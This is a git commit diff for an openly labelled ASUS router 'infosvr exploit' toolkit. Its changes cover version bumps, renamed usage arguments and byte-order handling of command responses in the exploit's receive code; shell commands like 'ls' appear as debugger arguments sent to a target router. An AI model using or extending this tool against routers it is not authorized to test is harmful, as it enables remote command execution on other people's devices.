Fixed appcrash by adding byte order detection

Different firmware returns response length in different byte order. So,
when happens byte order mismatch application crashes.

AsusBinWrite/AsusBinWrite.cpp

@@ -518,11 +518,11 @@ int _tmain(int argc, _TCHAR* argv[])
 
 	if (argc <= 2)
 	{
-		printf_s("AsusBinWrite v1.21\n");
+		printf_s("AsusBinWrite v1.3\n");
 		printf_s("The ASUS Router infosvr exploit.\n");
 		printf_s("Licensed under GPL (http://www.gnu.org/licenses/gpl.html)\n");
 		printf_s("Copyright 2015 TishSerg, Ukraine\n\n");
-		printf_s("Usage: AsusBinWrite <file2write> <path2write> [<target_ip> [APPEND] [RESUME] [TERSE]]\n");
+		printf_s("Usage: AsusBinWrite <localFile> <targetFile> [<target_ip> [APPEND] [RESUME] [TERSE]]\n");
 		//for (int i = 0; i < 256; i++)
 		//{
 		//	printf_s("%d\t->%c\n", i, i);

AsusCmd/AsusCmd.cpp

@@ -16,7 +16,7 @@ int _tmain(int argc, _TCHAR* argv[])
 
 	if (argc <= 1)
 	{
-		printf_s("AsusCmd v1.2\n");
+		printf_s("AsusCmd v1.3\n");
 		printf_s("The ASUS Router infosvr exploit.\n");
 		printf_s("Licensed under GPL (http://www.gnu.org/licenses/gpl.html)\n");
 		printf_s("Copyright 2015 TishSerg, Ukraine\n\n");
@@ -75,11 +75,11 @@ int _tmain(int argc, _TCHAR* argv[])
 	{
 		for (int i = 3; i < argc; i++)
 		{
-			if (stricmp(argv[i], "VERBOSE") == 0)
+			if (_stricmp(argv[i], "VERBOSE") == 0)
 			{
 				ecfVerbose = EC_FLAG_VERBOSE;
 			}
-			else if (stricmp(argv[i], "RES_ONLY") == 0)
+			else if (_stricmp(argv[i], "RES_ONLY") == 0)
 			{
 				ecfResOnly = EC_FLAG_RESONLY;
 			}

AsusCmd/AsusCmd.vcxproj.user

@@ -1,7 +1,7 @@
 <?xml version="1.0" encoding="utf-8"?>
 <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <LocalDebuggerCommandArguments>hostname</LocalDebuggerCommandArguments>
+    <LocalDebuggerCommandArguments>ls</LocalDebuggerCommandArguments>
     <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

AsusRouterTools.sln

@@ -21,11 +21,6 @@ Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "sources", "sources", "{9464
 		Common\sources\InfosvrExploit.cpp = Common\sources\InfosvrExploit.cpp
 	EndProjectSection
 EndProject
-Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{EC6E5460-8399-4959-AEC2-15CCE18A3F1A}"
-	ProjectSection(SolutionItems) = preProject
-		gpl.txt = gpl.txt
-	EndProjectSection
-EndProject
 Global
 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 		Debug|Win32 = Debug|Win32

Common/sources/InfosvrExploit.cpp

@@ -83,7 +83,7 @@ char* getResponse(IBOX_COMM_PKT_HDR_EX* phdr_ex, SOCKET sock, SOCKADDR_IN* targe
 	IBOX_COMM_PKT_RES_EX *phdr_res	= (IBOX_COMM_PKT_RES_EX*)pdubuf_res;							// receive buffer header
 	PKT_SYSCMD_RES *syscmd_res		= (PKT_SYSCMD_RES*)(pdubuf_res+sizeof(IBOX_COMM_PKT_RES_EX));	// receive buffer body
 
-	char resBuf[SYSCMDBUF_RES_MAX+1] = "";	// response text
+	static char resBuf[SYSCMDBUF_RES_MAX+1] = "";	// response text (not thread-safe)
 	BOOL resGot = FALSE;
 
 	for (int i = 0; i < RECV_MAX; i++)
@@ -165,8 +165,25 @@ char* getResponse(IBOX_COMM_PKT_HDR_EX* phdr_ex, SOCKET sock, SOCKADDR_IN* targe
 
 				if (bNewInfo)
 				{
-					memcpy_s(resBuf, sizeof(resBuf), syscmd_res->res, ntohs(syscmd_res->len));
-					resBuf[ntohs(syscmd_res->len)] = '\0';
+					int resLen;	// different firmware return response length in different byte order
+					if (syscmd_res->len > SYSCMDBUF_RES_MAX)
+					{
+						if (ntohs(syscmd_res->len) > SYSCMDBUF_RES_MAX)
+						{	// bad if it happens
+							resLen = SYSCMDBUF_RES_MAX;
+						}
+						else
+						{
+							resLen = ntohs(syscmd_res->len);	// network byte order (stock firmware?)
+						}
+					}
+					else
+					{
+						resLen = syscmd_res->len;	// normal byte order (AsusWRT firmware?)
+					}
+
+					memcpy_s(resBuf, sizeof(resBuf), syscmd_res->res, resLen);
+					resBuf[resLen] = '\0';
 					resGot = TRUE;
 
 					if (!(ec_flags&EC_FLAG_SILENT))
@@ -176,13 +193,13 @@ char* getResponse(IBOX_COMM_PKT_HDR_EX* phdr_ex, SOCKET sock, SOCKADDR_IN* targe
 
 					if (!(ec_flags&EC_FLAG_SILENT) && !(ec_flags&EC_FLAG_RESONLY))
 					{
-						if (ntohs(syscmd_res->len) >= SYSCMDBUF_RES_MAX)
+						if (resLen >= SYSCMDBUF_RES_MAX)
 						{
-							printf_s("\nResponse from %s (%d chars - %c).\n", inet_ntoa(targetAddr->sin_addr), ntohs(syscmd_res->len), 19);	// command output may be truncated
+							printf_s("\nResponse from %s (%d chars - %c).\n", inet_ntoa(targetAddr->sin_addr), resLen, 19);	// command output may be truncated
 						}
 						else
 						{
-							printf_s("\nResponse from %s (%d chars).\n", inet_ntoa(targetAddr->sin_addr), ntohs(syscmd_res->len));
+							printf_s("\nResponse from %s (%d chars).\n", inet_ntoa(targetAddr->sin_addr), resLen);
 						}
 					}